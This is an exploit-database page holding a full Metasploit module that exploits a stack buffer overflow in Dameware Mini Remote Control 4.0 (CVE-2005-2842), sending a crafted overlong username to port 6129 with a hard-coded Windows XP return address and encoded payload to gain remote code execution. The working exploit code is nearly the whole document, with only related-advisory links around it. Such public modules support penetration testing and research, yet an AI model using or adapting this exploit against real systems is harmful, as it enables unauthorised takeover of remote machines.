Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
packetstormJames FittsPACKETSTORM:144179
HistorySep 15, 2017 - 12:00 a.m.

Dameware Mini Remote Control 4.0 Username Stack Buffer Overflow

2017-09-1500:00:00
James Fitts
packetstormsecurity.com
52

EPSS

0.745

Percentile

98.2%

JSON
`require 'msf/core'  
  
class MetasploitModule < Msf::Exploit::Remote  
Rank = GreatRanking  
  
include Msf::Exploit::Remote::Tcp  
  
def initialize(info = {})  
super(update_info(info,  
'Name' => 'Dameware Mini Remote Control Username Stack Buffer Overflow',  
'Description' => %q{  
This module exploits a stack based buffer overflow vulnerability found  
in Dameware Mini Remote Control v4.0. The overflow is caused when sending  
an overly long username to the DWRCS executable listening on port 6129.  
The username is read into a strcpy() function causing an overwrite of  
the return pointer leading to arbitrary code execution.  
},  
'Author' => [ 'James Fitts' ],  
'License' => MSF_LICENSE,  
'Version' => '$Revision: $',  
'References' =>  
[  
[ 'CVE', '2005-2842' ],  
[ 'BID', '14707' ],  
[ 'URL', 'http://secunia.com/advisories/16655' ],  
[ 'URL', 'http://archives.neohapsis.com/archives/fulldisclosure/2005-08/1074.html' ]  
],  
'DefaultOptions' =>  
{  
'EXITFUNC' => 'thread',  
},  
'Privileged' => true,  
'Payload' =>  
{  
'Space' => 140,  
'BadChars' => "\x00\x0a\x0d",  
'StackAdjustment' => -3500,  
'PrependEncoder' => "\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff",  
'Compat' =>  
{  
'SymbolLookup' => '+ws2ord',  
},  
},  
'Platform' => 'win',  
'Targets' =>  
[  
[   
'Windows XP SP3 EN',   
{   
# msvcrt.dll  
# push esp/ retn  
'Ret' => 0x77c35459,   
}   
],  
],  
'DefaultTarget' => 0,  
'DisclosureDate' => 'Sept 01 2005'))  
  
register_options(  
[  
Opt::RPORT(6129),  
], self.class )  
end  
  
def pkt1  
p = payload.encoded  
  
boom = "\x43" * 259  
boom[100, 4] = [target.ret].pack('V')  
boom[108, p.length] = p  
  
packet = "\x00" * 4056  
packet[0, 4] = "\x30\x11\x00\x00"  
packet[4, 4] = "\x00\x00\x00\x00"  
packet[8, 4] = "\xd7\xa3\x70\x3d"  
packet[12, 4] = "\x0a\xd7\x0d\x40"  
packet[16, 20] = "\x00" * 20  
packet[36, 4] = "\x01\x00\x00\x00"  
  
packet[40, 4] = [0x00002710].pack('V')  
packet[196, 259] = rand_text_alpha(259)  
packet[456, 259] = boom  
packet[716, 259] = rand_text_alpha(259)  
packet[976, 259] = rand_text_alpha(259)  
packet[1236, 259] = rand_text_alpha(259)  
packet[1496, 259] = rand_text_alpha(259)  
  
return packet  
end  
  
def pkt2  
packet = "\x00" * 4096  
packet[756, 259] = rand_text_alpha(259)  
  
return packet  
  
end  
  
def exploit  
connect  
  
sock.put(pkt1)  
sock.recv(1024)  
sock.put(pkt2)  
sock.recv(84)  
  
handler  
disconnect  
end  
  
end  
__END__  
  
`

Related

nessus 1
cve 1
exploitdb 2
nvd 1
checkpoint_advisories 1
cvelist 1
zdt 1
nessus
nessus
DameWare Mini Remote Control Pre-Authentication Username Remote Overflow
2005-09-01 00:00:00
cve
cve
CVE-2005-2842
2005-09-08 10:03:00
exploitdb
exploitdb
DameWare Mini Remote Control 4.0 &lt; 4.9 - Client Agent Remote Overflow
2005-08-31 00:00:00
Dameware Mini Remote Control 4.0 - Username Stack Buffer Overflow (Metasploit)
2017-09-13 00:00:00
nvd
nvd
CVE-2005-2842
2005-09-08 10:03:00
checkpoint_advisories
checkpoint_advisories
DameWare Mini Remote Control Service Username Overflow Buffer Overflow - Ver2 (CVE-2005-2842)
2014-12-28 00:00:00
cvelist
cvelist
CVE-2005-2842
2005-09-08 04:00:00
zdt
zdt
Dameware Mini Remote Control 4.0 - Username Stack Buffer Overflow Exploit
2017-09-13 00:00:00

EPSS

0.745

Percentile

98.2%

JSON
Related for PACKETSTORM:144179
nessus1cve1exploitdb2nvd1checkpoint_advisories1cvelist1zdt1